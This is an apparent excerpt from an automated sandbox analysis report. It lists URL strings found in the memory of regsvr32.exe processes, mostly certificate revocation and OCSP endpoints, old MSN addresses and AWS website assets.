          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: regsvr32.exe, 00000003.00000002.2112827451.0000000000330000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
          Source: regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.roox
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: regsvr32.exe, 00000003.00000002.2112827451.0000000000330000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
          Source: regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: regsvr32.exe, 00000003.00000002.2118009707.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: regsvr32.exe, 00000003.00000002.2118009707.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: regsvr32.exe, 00000003.00000002.2112827451.0000000000330000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://o.ss2.us/0
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: regsvr32.exe, 00000003.00000002.2112827451.0000000000330000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
          Source: regsvr32.exe, 00000003.00000002.2112827451.0000000000330000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
          Source: regsvr32.exe, 00000003.00000002.2117367997.0000000002D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123765831.0000000002D30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: regsvr32.exe, 00000003.00000002.2112873139.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122536646.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2130024625.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: regsvr32.exe, 00000003.00000002.2118009707.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: regsvr32.exe, 00000003.00000002.2118009707.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: regsvr32.exe, 00000003.00000002.2117367997.0000000002D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123765831.0000000002D30000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131004619.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: regsvr32.exe, 00000003.00000002.2118009707.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: regsvr32.exe, 00000003.00000002.2112827451.0000000000330000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoresp.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoutil.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
          Source: regsvr32.exe, 00000003.00000002.2118280737.00000000034EF000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
          Source: regsvr32.exe, 00000003.00000002.2118268102.00000000034D4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com;
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://a0.p.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://a1.awsstatic.com
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
          Source: regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/1
          Source: regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/L
          Source: regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/r
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://anchor.fm
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://aws-quickstart.s3.amazonaws.com
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/5b
          Source: regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
          Source: regsvr32.exe, 00000004.00000002.2122452932.00000000002FD000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/C
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
          Source: regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
          Source: regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
          Source: regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
          Source: regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
          Source: regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/mC
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/search/?searchQuery=
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/
          Source: regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
          Source: regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/y
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://awsmedia.s3.amazonaws.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://b0.p.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://c0.b0.p.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://calculator.aws
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://chtbl.com
